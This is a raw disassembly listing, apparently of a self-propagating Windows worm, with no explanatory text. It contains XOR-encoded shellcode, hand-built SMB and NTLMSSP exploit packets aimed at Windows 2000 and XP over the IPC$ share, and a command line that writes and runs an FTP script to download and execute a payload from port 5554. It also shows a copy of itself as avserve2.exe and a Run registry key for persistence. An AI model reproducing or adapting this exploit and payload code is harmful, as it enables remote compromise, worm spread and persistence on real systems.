dd 6C5F0000h, 74697277h, 65h, 72636C5Fh, 746165h, 6C530000h
dd 706565h, 6C5F0000h, 64616572h, 0
a_lopen db '_lopen',0
align 10h
dd 65470000h, 646F4D74h, 46656C75h, 4E656C69h, 41656D61h
dd 0
aCreatethread db 'CreateThread',0
align 4
aWinexec db 'WinExec',0
dd 65470000h, 73614C74h, 72724574h, 726Fh, 65470000h, 63695474h
dd 756F436Bh, 746Eh, 72430000h, 65746165h, 6574754Dh, 4178h
dd 6F430000h, 69467970h, 41656Ch, 65470000h, 6E695774h
dd 73776F64h, 65726944h, 726F7463h, 4179h, 4E52454Bh, 32334C45h
dd 6C6C642Eh, 53570000h, 32335F32h, 6C6C642Eh, 0
aAbortsystemshu db 'AbortSystemShutdownA',0
align 4
aRegclosekey db 'RegCloseKey',0
dd 65520000h, 74655367h, 756C6156h, 41784565h, 0
aRegopenkeya db 'RegOpenKeyA',0
aAdvapi32_dll db 'ADVAPI32.dll',0
align 4
aGetmodulehandl db 'GetModuleHandleA',0
align 4
aGetstartupinfo db 'GetStartupInfoA',0
dd 65470000h, 6D6F4374h, 646E616Dh, 656E694Ch, 41h, 56746547h
dd 69737265h, 6E6Fh, 78450000h, 72507469h, 7365636Fh, 73h
dd 6D726554h, 74616E69h, 6F725065h, 73736563h, 0
aGetcurrentproc db 'GetCurrentProcess',0
align 10h
aUnhandledexcep db 'UnhandledExceptionFilter',0
align 4
aFreeenvironmen db 'FreeEnvironmentStringsA',0
dd 72460000h, 6E456565h, 6F726976h, 6E656D6Eh, 72745374h
dd 73676E69h, 57h, 65646957h, 72616843h, 754D6F54h, 4269746Ch
dd 657479h, 65470000h, 766E4574h, 6E6F7269h, 746E656Dh
dd 69727453h, 73676Eh, 65470000h, 766E4574h, 6E6F7269h
dd 746E656Dh, 69727453h, 5773676Eh, 0
aSethandlecount db 'SetHandleCount',0
align 4
dd 65470000h, 64745374h, 646E6148h, 656Ch, 65470000h, 6C694674h
dd 70795465h, 65h, 70616548h, 74736544h, 796F72h, 65480000h
dd 72437061h, 65746165h, 0
aVirtualfree db 'VirtualFree',0
dd 65480000h, 72467061h, 6565h, 74520000h, 776E556Ch, 646E69h
dd 72570000h, 46657469h, 656C69h, 754D0000h, 4269746Ch
dd 54657479h, 6469576Fh, 61684365h, 72h, 53746547h, 6E697274h
dd 70795467h, 4165h, 65470000h, 72745374h, 54676E69h, 57657079h
dd 0
aGetcpinfo db 'GetCPInfo',0
align 4
aGetacp db 'GetACP',0
align 4
dd 65470000h, 4D454F74h, 5043h, 65480000h, 6C417061h, 636F6Ch
dd 69560000h, 61757472h, 6C6C416Ch, 636Fh, 65480000h, 65527061h
dd 6F6C6C41h, 63h, 614D434Ch, 72745370h, 41676E69h, 0
aLcmapstringw db 'LCMapStringW',0
align 4
dd 191h dup(0)
dword_406000 dd 0 dword_406004 dd 0 dword_406008 dd 0 dd offset ___initmbctable
dword_406010 dd 0 dword_406014 dd 0 dword_406018 dd 0 dword_40601C dd 0 dword_406020 dd 4 dup(0) off_406030 dd offset aEchoOffEchoOpe ; DATA XREF: sub_40127D+AA�r
; "echo off&echo open %s 5554>>cmd.ftp&ech"...
; char Str[]
Str db 'ë' ; DATA XREF: sub_40159E+132�o
; sub_40159E+1AB�o
; ---------------------------------------------------------------------------
adc [edx+4Ah], bl
xor ecx, ecx
mov cx, 17Dh
loc_40603E: ; CODE XREF: .text:00406042�j
xor byte ptr [edx+ecx], 99h
loop loc_40603E
jmp short loc_40604B
; ---------------------------------------------------------------------------
dw 0EBE8h
db 3 dup(0FFh)
; ---------------------------------------------------------------------------
loc_40604B: ; CODE XREF: .text:00406044�j
jo short near ptr dword_4059BC+626h
cwde
cdq
cdq
retn
; ---------------------------------------------------------------------------
db 0FDh, 38h, 0A9h
dd 12999999h, 0E91295D9h, 0D9123485h, 12411291h, 0ED12A5EAh
dd 6A9AE187h, 9AB9E712h, 8DD71262h, 0CECF74AAh, 9AA612C8h
dd 0F36B1262h, 3F6AC097h, 0C6C091EDh, 0DC9D5E1Ah, 0C6C0707Bh
dd 125412C7h, 5A9ABDDFh, 589A7848h, 12FF50AAh, 85DF1291h
dd 78585A9Ah, 12589A9Bh, 125A9A99h, 1A6E1263h, 4912975Fh
dd 71C09AF3h, 9999991Eh, 0CB945F1Ah, 65CE66CFh, 0F34112C3h
dd 0ED71C09Ch, 0C9999999h, 0F3C9C9C9h, 669BF398h, 411275CEh
dd 999B9E5Eh
dword_4060E4 dd 59AA4B9Dh, 0F39DDE10h, 66CACE89h, 98F369CEh, 6DCE66CAh
; DATA XREF: sub_40159E+102�o
dd 66CAC9C9h, 491261CEh, 12DD751Ah, 0F359AA6Dh, 9D10C089h
dd 10627B17h, 0CF10A1CFh, 0D9CF10A5h, 0B5DF5EFFh, 0DE149898h
dd 0AACFC989h, 0C8C8C850h, 0C8C898F3h, 0FAA5DE5Eh, 1499FDF4h
dd 0C8C9A5DEh, 0CB79CE66h, 0CA65CE66h, 0C965CE66h, 0AA7DCE66h
dd 591C3559h, 0CBC860ECh, 4B66CACFh, 7B32C0C3h, 5A59AA77h
dd 66677671h, 0EDFCDE66h, 0FAF6EBC9h, 0EBFDFDD8h, 99EAEAFCh
dd 0F8FCEBDAh, 0EBC9FCEDh, 0EAFCFAF6h, 0DC99D8EAh, 0CDEDF0E1h
dd 0F8FCEBF1h, 0F6D599FDh, 0F0D5FDF8h, 0EBF8EBFBh, 0EE99D8E0h
dd 0AAC6ABEAh, 0CACE99ABh, 0FAF6CAD8h, 0D8EDFCF2h, 0F7F0FB99h
dd 0F0F599FDh, 0F7FCEDEAh, 0FAFAF899h, 99EDE9FCh, 0EAF6F5FAh
dd 0FAF6EAFCh, 99EDFCF2h, 0
dword_4061CC dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: sub_401398+15D�o
; sub_40159E+2BD�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_406258 dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_401398+188�o
; sub_40159E+2EC�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 10h
dd 0
dword_406304 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_401398+1AD�o
; sub_40159E+315�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_4063E4 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_401398+53�o
; sub_40159E+57�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC: ; DATA XREF: sub_401398+85�o
; sub_40159E+89�o
unicode 0, <C$>,0
a????? db '?????',0
align 8
dword_406448 dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40159E+369�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 0
dword_4064B4 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40159E+392�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_406558 dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40159E+3C8�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
off_4065D8 dd offset loc_401495 ; DATA XREF: sub_40159E+3F6�o
dd 3, 40707Ch, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset dword_40707C
dd 1, 0
dd 1, 0
dd offset dword_40707C
dd 1, 0
dd 1, 0
dd offset dword_40707C
dd 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 0
dword_40666C dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40159E+425�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 0
dword_4066D8 dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40159E+450�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dword_40674C dd 0 dd 40A89Ah, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 4 dup(0)
dd 20h, 0Ch dup(0)
dword_406810 dd 1004600h ; sub_40159E+19E�r
dd 1, 20h, 0Ch dup(0)
dd 7515123Ch, 2, 20h, 0Ch dup(0)
dd 751C123Ch, 0Fh dup(0)
; char *off_4068C8
off_4068C8 dd offset aAvserve2_exe ; DATA XREF: sub_4020D7:loc_40212F�r
; sub_4020D7+B5�r
; "avserve2.exe"
dd offset aAvserve2 ; "avserve2"
; char *off_4068D0
off_4068D0 dd offset dword_406910 ; DATA XREF: sub_401B08+1A�r
; sub_401B08+2D�r
; char *off_4068D4
off_4068D4 dd offset dword_406908 ; DATA XREF: sub_401B08+77�r
; sub_401B08+84�r
; char *off_4068D8
off_4068D8 dd offset dword_406900 ; DATA XREF: sub_401B08+A8�r
; sub_401B08+B5�r
; char *off_4068DC
off_4068DC dd offset dword_4068F8 ; DATA XREF: sub_401B08+2BC�r
; sub_401B08+2C9�r ...
; char *off_4068E0
off_4068E0 dd offset dword_4068F0 ; DATA XREF: sub_401B08+184�r
; sub_401B08+191�r
; char *off_4068E4
off_4068E4 dd offset dword_4068E8 ; DATA XREF: sub_401B08+1B9�r
; sub_401B08+1C6�r
dword_4068E8 dd 20303531h, 0A4B4Fhdword_4068F0 dd 20303032h, 0A4B4Fhdword_4068F8 dd 20363232h, 0A4B4Fhdword_406900 dd 20303332h, 0A4B4Fhdword_406908 dd 20313333h, 0A4B4Fhdword_406910 dd 20303232h, 0A4B4FhaAvserve2 db 'avserve2',0 ; DATA XREF: .text:004068CC�o
align 4
aAvserve2_exe db 'avserve2.exe',0 ; DATA XREF: .text:off_4068C8�o
align 4
aEchoOffEchoOpe db 'echo off&echo open %s 5554>>cmd.ftp&echo anonymous>>cmd.ftp&echo '
; DATA XREF: .text:off_406030�o
db 'user&echo bin>>cmd.ftp&echo get %i_up.exe>>cmd.ftp&echo bye>>cmd.'
db 'ftp&echo on&ftp -s:cmd.ftp&%i_up.exe&echo off&del cmd.ftp&echo on'
db 0Ah,0
align 4
a127_0_0_1 db '127.0.0.1',0 ; DATA XREF: sub_4010D2:loc_401140�o
align 4
aCWin2_log db 'c:\win2.log',0 ; DATA XREF: sub_401210+27�o
aI db '%i',0 ; DATA XREF: sub_401210+16�o
align 4
aSC db '%s%c',0 ; DATA XREF: sub_401398+1DF�o
align 10h
aSIpc db '\\%s\ipc$',0 ; DATA XREF: sub_401398+20�o
; sub_40159E+23�o
align 4
dword_406A2C dd 6EB06EBh, 0 dword_406A34 dd 1CEC8166h dword_406A38 dd 0E4FF07h ; char a5_0[]
a5_0 db '5.0',0 ; DATA XREF: sub_401A84+4A�o
; char SubStr[]
SubStr db '5.1',0 ; DATA XREF: sub_401A84+27�o
; char aQuit[]
aQuit db 'QUIT',0 ; DATA XREF: sub_401B08+2DA�o
align 4
; char aRetr[]
aRetr db 'RETR',0 ; DATA XREF: sub_401B08+1A2�o
align 4
aI_I_I_I db '%i.%i.%i.%i',0 ; DATA XREF: sub_401B08+173�o
; sub_401EF0+D2�o
word_406A60 dw 2Ch ; DATA XREF: sub_401B08+EE�r
align 4
; char aPort[]
aPort db 'PORT',0 ; DATA XREF: sub_401B08+C6�o
align 4
; char aPass[]
aPass db 'PASS',0 ; DATA XREF: sub_401B08+95�o
align 4
; char aUser[]
aUser db 'USER',0 ; DATA XREF: sub_401B08+64�o
align 4
; char asc_406A7C[]
asc_406A7C: ; DATA XREF: sub_401EF0+102�o
unicode 0, < >,0
aJumpallsnlstil db 'JumpallsNlsTillt',0 ; DATA XREF: WinMain(x,x,x,x)+50�o
align 4
aJobaka3 db 'Jobaka3',0 ; DATA XREF: WinMain(x,x,x,x)+F�o
aSoftwareMicros db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_4020D7+8C�o
align 4
; char asc_406ACC[]
asc_406ACC: ; DATA XREF: sub_4020D7+4B�o
unicode 0, <\>,0
off_406AD0 dd offset __exit ; DATA XREF: __amsg_exit+1C�r
dword_406AD4 dd 2 ; __NMSG_WRITE+46�r
align 10h
off_406AE0 dd offset __wctype+2 ; DATA XREF: _isalnum+1E�r
; __isctype+12�r ...
dd offset __wctype+2
public __wctype
; const unsigned __int16 _wctype[]
__wctype dd 200000h ; DATA XREF: _x_ismbbtype+18�r
; .text:off_406AE0�o ...
unicode 0, < ((((( H>
dd 7 dup(100010h), 840010h, 4 dup(840084h), 100084h, 3 dup(100010h)
dd 3 dup(810081h), 0Ah dup(10001h), 3 dup(100010h), 3 dup(820082h)
dd 0Ah dup(20002h), 2 dup(100010h), 20h, 40h dup(0)
dword_406CEC dd 1 dd 2Eh, 1
dword_406CF8 dd 0C0000005h ; _xcptlookup+11�o
dd 0Bh, 0
dd 0C000001Dh, 4, 0
dd 0C0000096h, 4, 0
db 8Dh, 0
dw 0C000h
dd 8, 0
dd 0C000008Eh, 8, 0
dd 0C000008Fh, 8, 0
db 90h
db 2 dup(0), 0C0h
dd 8, 0
dd 0C0000091h, 8, 0
dd 0C0000092h, 8, 0
dd 0C0000093h, 8, 0
dword_406D70 dd 3 dword_406D74 dd 7 dword_406D78 dd 0Ah dword_406D7C dd 8Ch ; __XcptFilter+8F�w ...
dd 0FFFFFFFFh, 0A00h, 10h
dword_406D8C dd 19930520h, 4 dup(0) ; __NLG_Notify+2�o
dword_406DA0 dd 2 ; __NMSG_WRITE+28�r
off_406DA4 dd offset aR6002FloatingP ; DATA XREF: __NMSG_WRITE+FC�r
; __NMSG_WRITE+12D�r
; "R6002\r\n- floating point not loaded\r\n"
dd 8, 40536Ch, 9, 405340h, 0Ah, 40531Ch, 10h, 4052F0h
dd 11h, 4052C0h, 12h, 40529Ch, 13h, 405270h, 18h, 405238h
dd 19h, 405210h, 1Ah, 4051D8h, 1Bh, 4051A0h, 1Ch, 405178h
dd 78h, 405168h, 79h, 405158h, 7Ah, 405148h, 0FCh, 405144h
dd 0FFh, 405134h
byte_406E30 db 1 ; DATA XREF: __NMSG_WRITE+1B�o
; __setmbcp+E1�r
db 2, 4, 8
align 8
dword_406E38 dd 3A4h dd 82798260h, 21h, 0 ; DATA XREF: __setmbcp+11D�r
dword_406E48 dd 0DFA6h align 10h
dd 0A5A1h, 0
dd 0FCE09F81h, 0
dd 0FC807E40h, 0
dd 3A8h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE40h, 0
dd 3B5h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE41h, 0
dd 3B6h, 0A2E4A2CFh, 0A2E5001Ah, 5BA2E8h, 4 dup(0)
dd 0FE81h, 0
dd 0FEA17E40h, 0
dd 551h, 0DA5EDA51h, 0DA5F0020h, 32DA6Ah, 4 dup(0)
dd 0DED8D381h, 0F9E0h, 0FE817E31h, 0
dword_406F28 dd 3F8h ; __heap_alloc+5�r
align 10h
dword_406F30 dd 0 ; sub_401000+10�w ...
dword_406F34 dd 0 ; sub_401210+D�r
; char Source[]
Source db 4 dup(0) ; DATA XREF: sub_40127D+89�o
; sub_401398+C�o ...
dword_406F3C dd 0 ; char *dword_406F40
dword_406F40 dd 0 ; __setenvp:loc_402DB1�r ...
align 8
dword_406F48 dd 0 ; _fast_error_exit�r ...
dd 3 dup(0)
dword_406F58 dd 0 dword_406F5C dd 0 dword_406F60 dd 0 dword_406F64 dd 0 dword_406F68 dd 0 dword_406F6C dd 0 dd 0
dword_406F74 dd 0 dd 3 dup(0)
dword_406F84 dd 0 dd 0
byte_406F8C db 0 ; DATA XREF: _doexit+2D�w
align 10h
dword_406F90 dd 0 dword_406F94 dd 0 dword_406F98 dd 0 ; __XcptFilter+46�w ...
dword_406F9C dd 38h dup(0) dword_40707C dd 9 dup(0) ; .text:00406638�o ...
dword_4070A0 dd 0 ; ___crtGetEnvironmentStringsA+23�w ...
dword_4070A4 dd 0 dword_4070A8 dd 0 ; ___crtGetStringTypeA:loc_403786�w
dword_4070AC dd 0 ; _getSystemCP+4�w ...
dword_4070B0 dd 0 ; ___crtMessageBoxA+2E�w ...
dword_4070B4 dd 0 ; ___crtMessageBoxA:loc_4045C2�r
dword_4070B8 dd 0 ; ___crtMessageBoxA+60�r
dd 2 dup(0)
dword_4070C4 dd 0 dd 3 dup(0)
dword_4070D4 dd 0 ; _getSystemCP+3A�r ...
dd 0
dword_4070DC dd 0 ; ___crtLCMapStringA+4C�w ...
dword_4070E0 dd 0 dword_4070E4 dd 0 dword_4070E8 dd 0 ; ___sbh_alloc_new_region+5�r ...
dword_4070EC dd 0 ; ___sbh_free_block+259�r ...
dword_4070F0 dd 0 ; ___sbh_free_block+310�w ...
; void *Dst
Dst dd 0 ; DATA XREF: ___sbh_heap_init:loc_403D47�w
; ___sbh_free_block+22C�r ...
dword_4070F8 dd 0 ; ___sbh_find_block�r ...
dword_4070FC dd 0 ; ___sbh_find_block+8�r ...
dword_407100 dd 0 ; __setmbcp+65�w ...
align 10h
dword_407110 dd 3 dup(0) ; __setmbcp+171�o ...
dword_40711C dd 0 ; __setmbcp+15D�w ...
byte_407120 db 0 ; DATA XREF: _setSBUpLow:loc_403BF2�w
; _setSBUpLow:loc_403C0F�w ...
align 4
dd 3Fh dup(0)
byte_407220 db 0 ; DATA XREF: __setmbcp+5C�o
; __setmbcp+AF�o ...
byte_407221 db 0 ; DATA XREF: _parse_cmdline+3F�r
; _parse_cmdline+84�r ...
align 4
dd 40h dup(0)
dword_407324 dd 0 ; __setmbcp+12B�w ...
dword_407328 dd 0 ; __heap_init+29�r ...
dd 5 dup(0)
dword_407340 dd 0 ; __ioinit+45�r ...
dword_407344 dd 3Fh dup(0) dword_407440 dd 0 ; __ioinit:loc_403261�r ...
dword_407444 dd 0 dword_407448 dd 0 dword_40744C dd 0 dword_407450 dd 0 dword_407454 dd 0 dword_407458 dd 0 dd 6E9h dup(0)
_text ends
; Section 3. (virtual address 00028000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00027200
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 428000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start